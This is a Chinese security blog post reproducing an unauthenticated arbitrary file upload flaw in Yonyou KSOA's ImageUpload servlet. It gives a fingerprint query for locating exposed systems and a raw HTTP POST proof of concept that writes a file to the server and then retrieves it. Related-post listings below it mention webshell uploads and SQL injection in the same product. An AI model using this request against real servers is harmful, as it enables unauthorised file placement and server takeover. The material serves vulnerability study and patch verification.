【漏洞复现】用友时空KSOA ImageUpload 任意文件上传漏洞

最新推荐文章于 2024-10-09 00:36:59 发布
最新推荐文章于 2024-10-09 00:36:59 发布
阅读量323 收藏 2
点赞数 1
分类专栏: Web安全 漏洞复现 用友 文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34780861/article/details/137240813
版权
漏洞复现 同时被 3 个专栏收录
21 篇文章 3 订阅
订阅专栏
用友
12 篇文章 0 订阅
订阅专栏
Web安全
11 篇文章 6 订阅
订阅专栏

更多干货POC获取,请关注公众号:如棠安全

Nx01 阅读须知

      如棠安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

Nx02 漏洞描述     

      用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业前沿的IT需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话。用友时空KSOA平台ImageUpload处存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。

Nx03 系统指纹
鹰图:

app.name="用友时空 KSOA"

Nx04 产品主页

Nx05 漏洞复现

poc

POST /servlet/com.sksoft.bill.ImageUpload?filename=1.txt&filepath=/ HTTP/1.1
User-Agent: Java/1.8.0_381
Host: {hostname}
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: 
Content-Length: 5
Connection: close

Hello Word  0.0

访问上传文件路径

/pictures/1.txt

更多干货POC获取,请关注公众号:如棠安全

如棠安全
关注
专栏目录
【1day】用友时空KSOA平台 任意文件上传漏洞学习
记录并分享学习安全的知识点..
09-29 397
用友时空KSOA平台是由用友网络科技股份有限公司开发的一款企业级协同办公平台,旨在提高企业管理效率和协作效率。该平台提供了多种功能模块,包括组织管理、人力资源管理、工作流管理、知识管理、项目管理、文档管理等。用友时空KSOA平台存在任意文件上传漏洞,攻击者通过上传恶意文件,从而在Web服务器上执行未经授权的操作。
用友时空KSOA ImageUpload任意文件上传漏洞复现+利用
0xSec
04-04 2429
用友时空KSOA平台ImageUpload处存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
漏洞复现用友时空KSOA sKeyvalue参数存在SQL注入漏洞
qq_34780861的博客
04-01 319
用友时空KSOA平台sKeyvalue参数存在SQL注入漏洞
用友时空KSOA软件前台文件上传漏洞
holyxp的博客
08-01 708
用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。用友时空KSOA平台ImageUpload处存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
用友时空KSOA UploadImage存在任意文件上传漏洞
Keepb1ue的博客
12-29 812
用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。用友时空KSOAUploadImage接口存在任意文件上传漏洞,攻击者可以通过构造特殊请求包上传恶意后门文件,从而获取服务器权限。
用友时空KSOA ImageUpload 任意文件上传
qq_36334672的博客
01-26 203
【代码】用友时空KSOA ImageUpload 任意文件上传
实战红队挖掘漏洞---用友时空KSOA v9.0版本ImageUpload任意文件上传漏洞+getshell
随心所欲不逾矩
09-19 923
软件介绍:用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。emmm,怎么说呢,就是又在一次加班码到晚上十点的时候,挖掘到了一个用友时空ksoa v9.0文件上传漏洞。开开心心连接马,嗯,连不上,emm,头疼,有防御。上传成功是这个模样,嗯,被解析了。但是,发现,有360主动防御,很头疼。
用友时空KSOA UploadImage任意文件上传漏洞
Keepb1ue的博客
12-24 2013
用友时空 KSOA 是根据流通企业前沿的IT需求推出的统的IT基础架构,它可以让流通企业各个时期建立的 IT 系统之间彼此轻松对话。由于用友时空设备开放了文件上传功能,但未鉴权且上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到服务器,再利用该漏洞获取权限并执行任意命令。2.设置内容检测机制和白名单上传机制。1.通过防火墙等安全设备限制访问策略。3.如非必要,禁止公网访问该系统。app=“用友-时空KSOA
漏洞复现用友 时空KSOA com.sksoft.v8.trans.servlet.TaskRequestServle SQL注入漏洞
alert['Hello World']
09-30 394
用友 时空KSOA com.sksoft.v8.trans.servlet.TaskRequestServle 接口存在一个 SQL 注入漏洞,通过这个漏洞可以操纵服务器的数据库。这意味着不法分子可以利用这个漏洞来获取对数据库的完全控制权,从而查看、修改甚至删除数据库中的数据,严重威胁系统的安全性。
用友时空KSOAV9.0文件上传漏洞复现
weixin_53884648的博客
05-22 1321
用友时空文件上传漏洞复现
漏洞复现用友 时空KSOA ImageUpload 任意文件上传漏洞
最新发布
alert['Hello World']
10-09 284
用友 时空KSOA ImageUpload 文件存在一个任意文件上传漏洞。攻击者可以通过这个漏洞上传恶意文件到服务器,从而获取服务器的控制权,以及在服务器上执行任意命令,访问敏感数据,甚至完全接管服务器,对系统的安全性构成严重威胁。
漏洞复现用友时空-KSOA-ImageUpload-文件上传
知黑而守白
03-26 136
用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业前沿的IT需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。用友时空KSOA ImageUpload 接口存在一个任意文件上传漏洞,该漏洞使得攻击者可以在受影响的系统上上传恶意文件,潜在风险包括远程执行恶意代码、访问敏感数据,以及其他危险操作。攻击者可以通过上传恶意文件来滥用系统,可能导致灾难性后果。
漏洞复现 || 某友文件上传
失心少年
07-10 262
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!某友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业前沿的IT需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话。2.如上传Webshell地址访问如下。
用友时空KSOA V9.0文件上传漏洞复现
06-21 1359
用友时空KSOA平台ImageUpload处存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
用友GRP-U8 U8AppProxy任意文件上传漏洞复现+利用
0xSec
03-21 5537
用友 GRP-U8 U8AppProxy接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
无胁科技-TVD每日漏洞情报-2022-7-30
wuthreat无胁科技的博客
07-30 956
参考链接https//tvd.wuthreat.com/#/listDetail?参考链接https//tvd.wuthreat.com/#/listDetail?参考链接https//tvd.wuthreat.com/#/listDetail?参考链接https//tvd.wuthreat.com/#/listDetail?参考链接https//tvd.wuthreat.com/#/listDetail?漏洞编号CNVD-2022-14717。相关涉及用友时空KSOA软件。...
【1day】用友时空KSOA平台 imagefield接口SQL注入漏洞学习
记录并分享学习安全的知识点..
09-29 271
用友时空KSOA平台是由用友网络科技股份有限公司开发的一款企业级协同办公平台,旨在提高企业管理效率和协作效率。该平台提供了多种功能模块,包括组织管理、人力资源管理、工作流管理、知识管理、项目管理、文档管理等。用友时空KSOA平台 imagefield接口存在SQL注入漏洞,攻击者通过在Web应用程序的输入字段中注入恶意的SQL代码,从而在后台数据库中执行未经授权的操作。
java servlet上传图片_servlet实现图片上传功能
weixin_30556403的博客
02-12 720
一个简单的servlet例子,实现图片的上传功能,上传的图片给 HttpServletResponse 对象public class BackGroundLogoServlet extends HttpServlet{private static final Logger m_logger=Logger.getLogger (BackGroundLogoServlet. class);@Over...
servlet实现图片的上传
qq_43392001的博客
06-22 8995
servlet实现图片的上传 我们通常说的上传图片,是将图片上传到服务器上面,本篇以tomcat为例,实现简单的本地图片上传服务器。 一、图片的上传需要引入两个jar包: commons-fileupload-1.4.jar,下载地址:http://commons.apache.org/proper/commons-fileupload/; commons-io-2.6.jar,下载地址:http...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值